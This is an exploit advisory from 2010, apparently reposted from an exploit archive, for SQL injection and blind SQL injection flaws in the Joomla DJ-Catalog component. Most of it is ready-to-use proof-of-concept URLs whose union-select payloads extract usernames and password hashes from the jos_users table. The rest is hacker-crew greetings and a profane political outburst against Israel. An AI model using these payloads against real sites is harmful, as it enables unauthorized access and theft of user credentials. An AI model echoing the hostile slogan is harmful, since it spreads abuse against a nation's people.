Home / os / win7

Joomla Component com_djcatalog SQL Injection Vulnerability

Posted on 10 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Joomla Component com_djcatalog SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================== Joomla Component com_djcatalog SQL Injection Vulnerability ========================================================== [+]Title : Joomla com_djcatalog component SQL/Bsql Injection Multiple Vulnerability [+]Author : **RoAd_KiLlEr** [+]Contact : RoAd_KiLlEr[at]Khg-Crew[dot]Ws [+]Impact : Exposure of sensitive information [+]Where : From Remote [+]Tested on : Win Xp Sp 2/3 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws [~] Home: http://a-h-crew.net ==========ExPl0iT3d by **RoAd_KiLlEr**========== [+]Software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : DJ-Catalog directory Developer : AndrzejH License : GPL type : Non-Commercial Download : http://www.design-joomla.eu/downloads/download/components/djcatalog-1.5.x/start-download.html =================================================================================== [+]Description : Dj catalog is a universal component which meets these expectations, may serve as a directory of products or specific galleries. Thanks to a flexible structure can be easily customized to your individual visual requirements. =================================================================================== [+] I.SQL injection from id [parameter] &amp; cid [parameter] Poc/Exploit: ~~~~~~~~~ (id) http://127.0.0.1/[path]/index.php?option=com_djcatalog&amp;view=showItem&amp;id=[Sqlinjection] [Sqlinjection]: null+and+1=0+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+jos_users (cid) index.php?option=com_djcatalog&amp;view=show&amp;cid=x[Sqlinjection] x = valid cid [Sqlinjection Sploit] = +and+1=2+union+select+1,password,3,4+from+jos_users =================================================================================== [+] II.BSQL injection (id)/(cid) Poc/Exploit: ~~~~~~~~~ (id) http://127.0.0.1/[path]/index.php?option=com_djcatalog&amp;view=showItem&amp;id=[BSQL] (cid) http://127.0.0.1/[path]/index.php?option=com_djcatalog&amp;view=show&amp;cid=x[BSQL] x = valid cid (blog&amp;cid) http://127.0.0.1/[path]/index.php?option=com_djcatalog&amp;view=show&amp;layout=blog&amp;cid=x[BSQL] x = valid cid =========================================================================================== [!] Political Protest: Fuck You Israel , The REAL Terrorrist's of The WORLD =========================================================================================== [!] **RoAd_KiLlEr** =========================================================================================== [!] MaiL: sukihack[at]gmail[dot]com =========================================================================================== [!] Greetz To : Ton![w]indowS | X-net | b4cKd00r ~ | DarKHackeR. | The|DennY' | EaglE EyE | Lekosta | KHG | All Members From A-H-Crew.Net &amp; All Albanian/Kosova Hackers | All My Friends =========================================================================================== [!] Spec Th4nks: Inj3ct0r.com | indoushka from Dz-Ghost Team | Sniper Hail | NEO from DATA ir Security Group | MaFFiTeRRoR =========================================================================================== [!] Red n'black i dress eagle on my chest It's good to be an ALBANIAN Keep my head up high for that flag I die Im proud to be an ALBANIAN =========================================================================================== # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP